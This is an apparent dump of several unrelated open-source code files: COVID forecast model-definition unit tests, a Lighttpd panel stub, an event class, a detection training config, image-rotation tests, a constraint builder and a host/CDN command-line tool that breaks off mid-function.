"feature_name": constants.AMP_NON_ESSENTIAL_BUSINESS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_NON_ESSENTIAL_BUSINESS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_STAY_AT_HOME,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_STAY_AT_HOME,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_FACE_MASKS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_FACE_MASKS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AVERAGE_TEMPERATURE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AVERAGE_TEMPERATURE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.MAX_TEMPERATURE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MAX_TEMPERATURE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.MIN_TEMPERATURE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MIN_TEMPERATURE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.RAINFALL,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.RAINFALL,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SNOWFALL,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SNOWFALL,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.COMMERCIAL_SCORE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.COMMERCIAL_SCORE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIGEN_POSITIVE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIGEN_POSITIVE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIGEN_TOTAL,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIGEN_TOTAL,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIBODY_NEGATIVE,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIBODY_NEGATIVE,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIBODY_TOTAL,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.ANTIBODY_TOTAL,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.RECOVERED_FEATURE_KEY,
"feature_value": 12,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.RECOVERED_FEATURE_KEY,
"feature_value": 11,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.HOSPITALIZED_INCREASE_FEATURE_KEY,
"feature_value": 16,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.HOSPITALIZED_INCREASE_FEATURE_KEY,
"feature_value": 14,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_COUGH,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_COUGH,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_CHILLS,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_CHILLS,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_ANOSMIA,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_ANOSMIA,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_INFECTION,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_INFECTION,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_CHEST_PAIN,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_CHEST_PAIN,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_FEVER,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_FEVER,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_SHORTNESSBREATH,
"feature_value": 0.6,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.SYMPTOM_SHORTNESSBREATH,
"feature_value": 0.7,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
"feature_value": 10,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
"feature_value": 20,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
"feature_value": 5,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
"feature_value": 10,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
])
static_data = pd.DataFrame([{
"feature_name": constants.AQI_MEAN,
"feature_value": 105,
"geo_id": "4059"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4058"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4059"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 120,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 100,
"geo_id": "4059"
}, {
"feature_name": constants.POPULATION,
"feature_value": 70,
"geo_id": "4059"
}, {
"feature_name": constants.POPULATION,
"feature_value": 50,
"geo_id": "4058"
}, {
"feature_name": constants.POPULATION,
"feature_value": 10,
"geo_id": "4057"
}])
state_model = us_model_definitions.StateModelDefinition(gt_source="JHU")
static_features, _ = state_model._extract_static_features(
static_data=static_data, locations=["4059"])
actual, _ = state_model._extract_ts_features(
ts_data=ts_data,
static_features=static_features,
locations=["4059"],
training_window_size=2)
expected = {
constants.CONFIRMED: {
"4059": np.array([100, 200], dtype="float32")
},
constants.DEATH: {
"4059": [10, np.nan]
},
constants.DEATH_PREPROCESSED: {
"4059": [0, 0]
},
constants.ICU: {
"4059": np.array([2, 5], dtype="float32")
},
constants.INFECTED: None,
constants.HOSPITALIZED: {
"4059": np.array([100, 200], dtype="float32")
},
constants.MOBILITY_INDEX: {
"4059": np.array([1, 0], dtype="float32")
},
constants.VENTILATOR: {
"4059": np.array([50, 100], dtype="float32")
},
constants.RECOVERED_DOC: {
"4059": np.array([11, 12], dtype="float32")
},
constants.HOSPITALIZED_INCREASE: {
"4059": np.array([14, 16], dtype="float32")
},
constants.HOSPITALIZED_CUMULATIVE: {
"4059": np.array([14, 30], dtype="float32")
},
constants.TOTAL_TESTS_PER_CAPITA: {
"4059": np.array([1, 0], dtype="float32")
},
}
for ts_feature_name in expected:
self.assertIn(ts_feature_name, actual)
np.testing.assert_equal(
actual[ts_feature_name], expected[ts_feature_name],
"Feature name {} is not aligned.".format(ts_feature_name))
def test_get_static_features(self):
expected_static_features = {
constants.POPULATION:
constants.POPULATION,
constants.INCOME_PER_CAPITA:
constants.INCOME_PER_CAPITA,
constants.POPULATION_DENSITY_PER_SQKM:
constants.POPULATION_DENSITY_PER_SQKM,
constants.HOUSEHOLD_FOOD_STAMP:
constants.HOUSEHOLD_FOOD_STAMP,
constants.KAISER_POPULATION:
constants.KAISER_POPULATION,
constants.KAISER_60P_POPULATION:
constants.KAISER_60P_POPULATION,
constants.ICU_BEDS:
constants.ICU_BEDS,
constants.HOUSEHOLDS:
constants.HOUSEHOLDS,
constants.HOSPITAL_RATING1:
constants.HOSPITAL_RATING1,
constants.HOSPITAL_RATING2:
constants.HOSPITAL_RATING2,
constants.HOSPITAL_RATING3:
constants.HOSPITAL_RATING3,
constants.HOSPITAL_RATING4:
constants.HOSPITAL_RATING4,
constants.HOSPITAL_RATING5:
constants.HOSPITAL_RATING5,
constants.AQI_MEAN:
constants.AQI_MEAN,
constants.NON_EMERGENCY_SERVICES:
constants.NON_EMERGENCY_SERVICES,
constants.EMERGENCY_SERVICES:
constants.EMERGENCY_SERVICES,
constants.HOSPITAL_ACUTE_CARE:
constants.HOSPITAL_ACUTE_CARE,
constants.CRITICAL_ACCESS_HOSPITAL:
constants.CRITICAL_ACCESS_HOSPITAL,
constants.PATIENCE_EXPERIENCE_SAME:
constants.PATIENCE_EXPERIENCE_SAME,
constants.PATIENCE_EXPERIENCE_BELOW:
constants.PATIENCE_EXPERIENCE_BELOW,
constants.PATIENCE_EXPERIENCE_ABOVE:
constants.PATIENCE_EXPERIENCE_ABOVE,
}
state_model = us_model_definitions.StateModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_static_features = state_model.get_static_features()
np.testing.assert_equal(expected_static_features, actual_static_features)
def test_extract_state_static_features(self):
static_data = pd.DataFrame([{
"feature_name": constants.AQI_MEAN,
"feature_value": 105,
"geo_id": "4059"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4058"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4059"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 120,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 100,
"geo_id": "4059"
}, {
"feature_name": constants.POPULATION,
"feature_value": 70,
"geo_id": "4059"
}, {
"feature_name": constants.POPULATION,
"feature_value": 50,
"geo_id": "4058"
}, {
"feature_name": constants.POPULATION,
"feature_value": 10,
"geo_id": "4057"
}])
state_model = us_model_definitions.StateModelDefinition(gt_source="JHU")
actual, _ = state_model._extract_static_features(
static_data=static_data, locations=["4059", "4058"])
expected = {
constants.AQI_MEAN: {
"4059": 0,
"4058": 0
},
constants.INCOME_PER_CAPITA: {
"4059": 0,
"4058": 1
},
constants.POPULATION: {
"4059": 70,
"4058": 50
},
constants.POPULATION_DENSITY_PER_SQKM: {
"4059": 0,
"4058": 0
},
}
for static_feature_name in expected:
self.assertEqual(actual[static_feature_name],
expected[static_feature_name])
class TestCountyModelDefinition(unittest.TestCase):
def test_get_ts_features(self):
expected_ts_features = {
constants.DEATH:
constants.JHU_COUNTY_DEATH_FEATURE_KEY,
constants.CONFIRMED:
constants.JHU_COUNTY_CONFIRMED_FEATURE_KEY,
constants.RECOVERED_DOC:
constants.CSRP_RECOVERED_FEATURE_KEY,
constants.HOSPITALIZED:
constants.CHA_HOSPITALIZED_FEATURE_KEY,
constants.HOSPITALIZED_CUMULATIVE:
constants.CHA_HOSPITALIZED_CUMULATIVE_FEATURE_KEY,
constants.ICU:
constants.CSRP_ICU_FEATURE_KEY,
constants.MOBILITY_INDEX:
constants.MOBILITY_INDEX,
constants.MOBILITY_SAMPLES:
constants.MOBILITY_SAMPLES,
constants.CSRP_TESTS:
constants.CSRP_TESTS,
constants.AMP_RESTAURANTS:
constants.AMP_RESTAURANTS,
constants.AMP_NON_ESSENTIAL_BUSINESS:
constants.AMP_NON_ESSENTIAL_BUSINESS,
constants.AMP_STAY_AT_HOME:
constants.AMP_STAY_AT_HOME,
constants.AMP_SCHOOLS_SECONDARY_EDUCATION:
constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
constants.AMP_EMERGENCY_DECLARATION:
constants.AMP_EMERGENCY_DECLARATION,
constants.AMP_GATHERINGS:
constants.AMP_GATHERINGS,
constants.AMP_FACE_MASKS:
constants.AMP_FACE_MASKS,
constants.DOW_WINDOW:
constants.DOW_WINDOW,
constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL:
constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL:
constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
}
county_model = us_model_definitions.CountyModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_ts_features = county_model.get_ts_features()
np.testing.assert_equal(expected_ts_features, actual_ts_features)
def test_get_ts_features_to_preprocess(self):
expected_ts_features = {
constants.MOBILITY_INDEX,
constants.MOBILITY_SAMPLES,
constants.CSRP_TESTS,
constants.CONFIRMED_PER_CSRP_TESTS,
constants.TOTAL_TESTS_PER_CAPITA,
constants.AMP_RESTAURANTS,
constants.AMP_NON_ESSENTIAL_BUSINESS,
constants.AMP_STAY_AT_HOME,
constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
constants.AMP_EMERGENCY_DECLARATION,
constants.AMP_GATHERINGS,
constants.AMP_FACE_MASKS,
constants.DEATH_PREPROCESSED,
constants.CONFIRMED_PREPROCESSED,
constants.DOW_WINDOW,
constants.TOTAL_TESTS_PER_CAPITA,
constants.VACCINATED_RATIO_FIRST_DOSE_PER_DAY_PREPROCESSED,
constants.VACCINATED_RATIO_SECOND_DOSE_PER_DAY_PREPROCESSED,
}
county_model = us_model_definitions.CountyModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_ts_features = county_model.get_ts_features_to_preprocess()
np.testing.assert_equal(expected_ts_features, actual_ts_features)
def test_extract_ts_county_features(self):
ts_data = pd.DataFrame([
{
"feature_name": "confirmed_cases",
"feature_value": 100,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": "confirmed_cases",
"feature_value": 200,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": "deaths",
"feature_value": 10,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": "deaths",
"feature_value": 13,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_INDEX,
"feature_value": 0.0,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_INDEX,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_SAMPLES,
"feature_value": 10,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_SAMPLES,
"feature_value": 12,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.CSRP_TESTS,
"feature_value": 70,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.CSRP_TESTS,
"feature_value": 140,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_GATHERINGS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_GATHERINGS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_EMERGENCY_DECLARATION,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_EMERGENCY_DECLARATION,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_RESTAURANTS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_RESTAURANTS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_NON_ESSENTIAL_BUSINESS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_NON_ESSENTIAL_BUSINESS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_STAY_AT_HOME,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_STAY_AT_HOME,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_FACE_MASKS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_FACE_MASKS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.CSRP_RECOVERED_FEATURE_KEY,
"feature_value": 12,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059",
},
{
"feature_name": constants.CSRP_RECOVERED_FEATURE_KEY,
"feature_value": 11,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059",
},
{
"feature_name": constants.CHA_HOSPITALIZED_FEATURE_KEY,
"feature_value": 100,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059",
},
{
"feature_name": constants.CHA_HOSPITALIZED_FEATURE_KEY,
"feature_value": 200,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059",
},
{
"feature_name": constants.CHA_HOSPITALIZED_CUMULATIVE_FEATURE_KEY,
"feature_value": 200,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059",
},
{
"feature_name": constants.CHA_HOSPITALIZED_CUMULATIVE_FEATURE_KEY,
"feature_value": 300,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059",
},
{
"feature_name": constants.CSRP_ICU_FEATURE_KEY,
"feature_value": 20,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059",
},
{
"feature_name": constants.CSRP_ICU_FEATURE_KEY,
"feature_value": 30,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059",
},
{
"feature_name": constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
"feature_value": 10,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
"feature_value": 20,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
"feature_value": 5,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
"feature_value": 10,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
])
static_data = pd.DataFrame([{
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4059"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 120,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 100,
"geo_id": "4059"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 70,
"geo_id": "4059"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 50,
"geo_id": "4058"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 10,
"geo_id": "4057"
}])
state_model = us_model_definitions.CountyModelDefinition(
gt_source="USAFACTS")
static_features, _ = state_model._extract_static_features(
static_data=static_data, locations=["4059"])
actual, _ = state_model._extract_ts_features(
ts_data=ts_data,
static_features=static_features,
locations=["4059"],
training_window_size=2)
expected = {
constants.DEATH: {
"4059": np.array([10, 13], dtype="float32")
},
constants.CONFIRMED: {
"4059": np.array([100, 200], dtype="float32")
},
constants.MOBILITY_SAMPLES: {
"4059": np.array([0, 1], dtype="float32")
},
constants.MOBILITY_INDEX: {
"4059": np.array([0, 1], dtype="float32")
},
constants.CSRP_TESTS: {
"4059": np.array([0, 1], dtype="float32")
},
constants.RECOVERED_DOC: {
"4059": np.array([11, 12], dtype="float32"),
},
constants.HOSPITALIZED: {
"4059": np.array([100, 200], dtype="float32"),
},
constants.HOSPITALIZED_CUMULATIVE: {
"4059": np.array([200, 300], dtype="float32"),
},
constants.ICU: {
"4059": np.array([20, 30], dtype="float32"),
},
constants.TOTAL_TESTS_PER_CAPITA: {
"4059": np.array([0, 0], dtype="float32"),
},
}
for ts_feature_name in expected:
self.assertIn(ts_feature_name, actual)
np.testing.assert_equal(
actual[ts_feature_name], expected[ts_feature_name],
"Unexpected value for feature %s" % ts_feature_name)
def test_get_static_features(self):
county_model = us_model_definitions.CountyModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_static_features = county_model.get_static_features()
self.assertEqual(len(actual_static_features), 51)
def test_get_all_locations(self):
input_df = pd.DataFrame(
{constants.GEO_ID_COLUMN: ["4059", "4060", "4061", "4062"]})
# Exclude FIPS 15005 (Kalawao County, no longer exist)
expected_locations = {"4059", "4060", "4061", "4062"}
county_model = us_model_definitions.CountyModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_locations = county_model.get_all_locations(input_df)
np.testing.assert_equal(expected_locations, actual_locations)
def test_extract_county_static_features(self):
static_data = pd.DataFrame([{
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4059"
}, {
"feature_name": constants.AREA,
"feature_value": 10,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 120,
"geo_id": "4058"
}, {
"feature_name": constants.INCOME_PER_CAPITA,
"feature_value": 100,
"geo_id": "4059"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 70,
"geo_id": "4059"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 50,
"geo_id": "4058"
}, {
"feature_name": constants.COUNTY_POPULATION,
"feature_value": 10,
"geo_id": "4057"
}])
county_model = us_model_definitions.CountyModelDefinition(gt_source="JHU")
actual, _ = county_model._extract_static_features(
static_data=static_data, locations=["4059", "4058"])
expected = {
constants.INCOME_PER_CAPITA: {
"4059": 0,
"4058": 1
},
constants.POPULATION: {
"4059": 70,
"4058": 50
}
}
for static_feature_name in expected:
self.assertEqual(actual[static_feature_name],
expected[static_feature_name],
"Unexpected value for feature %s" % static_feature_name)
if __name__ == "__main__":
unittest.main()
|
core/modules/lighttpd.py | HaonTshau/inpanel | 166 | 12697167 | <filename>core/modules/lighttpd.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 - 2019, doudoudzj
# All rights reserved.
#
# InPanel is distributed under the terms of the New BSD License.
# The full license can be found in 'LICENSE'.
"""Module for Lighttpd configuration management."""
def web_response(self):
action = self.get_argument('action', '')
if action == 'getsettings':
self.write({'code': 0, 'msg': 'Lighttpd 配置信息获取成功!', 'data': get_config()})
elif action == 'savesettings':
self.write({'code': 0, 'msg': 'Lighttpd 服务配置保存成功!', 'data': set_config(self)})
return
def get_config():
return dict()
def set_config(self):
return dict()
|
platypush/message/event/foursquare.py | RichardChiang/platypush | 228 | 12697178 | <gh_stars>100-1000
from typing import Dict, Any
from platypush.message.event import Event
class FoursquareCheckinEvent(Event):
"""
Event triggered when a new check-in occurs.
"""
def __init__(self, checkin: Dict[str, Any], *args, **kwargs):
super().__init__(*args, checkin=checkin, **kwargs)
# vim:sw=4:ts=4:et:
|
configs/baseline/faster_rcnn_r50_caffe_fpn_coco_partial_180k.py | huimlight/SoftTeacher | 604 | 12697204 | <filename>configs/baseline/faster_rcnn_r50_caffe_fpn_coco_partial_180k.py<gh_stars>100-1000
_base_ = "base.py"
fold = 1
percent = 1
data = dict(
samples_per_gpu=1,
workers_per_gpu=1,
train=dict(
ann_file="data/coco/annotations/semi_supervised/instances_train2017.${fold}@${percent}.json",
img_prefix="data/coco/train2017/",
),
)
work_dir = "work_dirs/${cfg_name}/${percent}/${fold}"
log_config = dict(
interval=50,
hooks=[
dict(type="TextLoggerHook"),
dict(
type="WandbLoggerHook",
init_kwargs=dict(
project="pre_release",
name="${cfg_name}",
config=dict(
fold="${fold}",
percent="${percent}",
work_dirs="${work_dir}",
total_step="${runner.max_iters}",
),
),
by_epoch=False,
),
],
)
|
python/cucim/src/cucim/core/operations/spatial/tests/test_rotate90.py | aasthajh/cucim | 131 | 12697208 | <reponame>aasthajh/cucim
import os
import cupy
import numpy as np
import pytest
import skimage.data
from PIL import Image
import cucim.core.operations.spatial as spt
def get_input_arr():
img = skimage.data.astronaut()
arr = np.asarray(img)
arr = np.transpose(arr)
return arr
def get_rotated_data():
dirname = os.path.dirname(__file__)
img1 = Image.open(os.path.join(os.path.abspath(dirname), "rotated.png"))
arr_o = np.asarray(img1)
arr_o = np.transpose(arr_o)
return arr_o
def test_rotate90_param():
arr = get_input_arr()
with pytest.raises(TypeError):
img = Image.fromarray(arr.T, 'RGB')
spt.image_rotate_90(img, 1, [1, 2])
def test_rotate90_numpy_input():
arr = get_input_arr()
rotate90_arr = get_rotated_data()
output = spt.image_rotate_90(arr, 1, [1, 2])
assert np.allclose(output, rotate90_arr)
def test_rotate90_cupy_input():
arr = get_input_arr()
rotate90_arr = get_rotated_data()
cupy_arr = cupy.asarray(arr)
cupy_output = spt.image_rotate_90(cupy_arr, 1, [1, 2])
np_output = cupy.asnumpy(cupy_output)
assert np.allclose(np_output, rotate90_arr)
def test_rotate90_batchinput():
arr = get_input_arr()
rotate90_arr = get_rotated_data()
arr_batch = np.stack((arr,) * 8, axis=0)
np_output = spt.image_rotate_90(arr_batch, 1, [2, 3])
assert np_output.shape[0] == 8
for i in range(np_output.shape[0]):
assert np.allclose(np_output[i], rotate90_arr)
|
pycalphad/core/constraints.py | HUISUN24/pycalphad | 162 | 12697215 | <filename>pycalphad/core/constraints.py
from pycalphad.core.constants import INTERNAL_CONSTRAINT_SCALING
from pycalphad.codegen.sympydiff_utils import build_constraint_functions
from collections import namedtuple
ConstraintTuple = namedtuple('ConstraintTuple', ['internal_cons_func', 'internal_cons_jac', 'internal_cons_hess',
'num_internal_cons'])
def build_constraints(mod, variables, parameters=None):
internal_constraints = mod.get_internal_constraints()
internal_constraints = [INTERNAL_CONSTRAINT_SCALING*x for x in internal_constraints]
cf_output = build_constraint_functions(variables, internal_constraints,
parameters=parameters)
internal_cons_func = cf_output.cons_func
internal_cons_jac = cf_output.cons_jac
internal_cons_hess = cf_output.cons_hess
return ConstraintTuple(internal_cons_func=internal_cons_func, internal_cons_jac=internal_cons_jac,
internal_cons_hess=internal_cons_hess,
num_internal_cons=len(internal_constraints))
|
cachebrowser/cli.py | zhenyihan/cachebrowser | 1,206 | 12697222 | <reponame>zhenyihan/cachebrowser<gh_stars>1000+
from functools import update_wrapper, partial
import json
import logging
from cachebrowser.models import Host
import click
from cachebrowser.api.core import APIManager, APIRequest
from cachebrowser.bootstrap import BootstrapError
main_commands = ['hostcli', 'cdncli', 'bootstrap']
api = APIManager()
logger = logging.getLogger(__name__)
def forward_to_api(route, params=None):
def wrapper(func):
@click.pass_obj
def inner(context, **kwargs):
request_params = params.copy() if params else {}
request_params.update(kwargs)
request = APIRequest(route, request_params)
request.reply = partial(func, context)
api.handle_api_request(context, request)
return update_wrapper(inner, func)
return wrapper
@click.group('host')
def hostcli():
pass
@hostcli.command('add')
@forward_to_api('/hosts/add')
@click.argument('hostname')
@click.argument('cdn')
@click.option('--ssl/--no-ssl', 'ssl', default=True)
def addhost(context):
click.echo("New host added")
@hostcli.command('list')
@forward_to_api('/hosts', {'page': 0, 'num_per_page': 0})
def listhost(context, hosts):
click.echo('\n'.join([host['hostname'] for host in hosts]))
@click.group('cdn')
def cdncli():
pass
@cdncli.command('add')
@forward_to_api('/cdns/add')
@click.argument('id')
@click.option('--name')
@click.option('--edge-server')
def addcdn(context):
click.echo("New CDN added")
@cdncli.command('list')
@forward_to_api('/cdns', {'page': 0, 'num_per_page': 0})
def listhost(context, cdns):
click.echo('\n'.join([cdn['id'] for cdn in cdns]))
@click.command('bootstrap')
@click.option('--save/--no-save', is_flag=True, default=False,
help="Save bootstrap information to database (default --no-save)")
@click.argument('hostname')
@click.pass_obj
def bootstrap(context, save, hostname):
try:
host_data = context.bootstrapper.lookup_host(hostname)
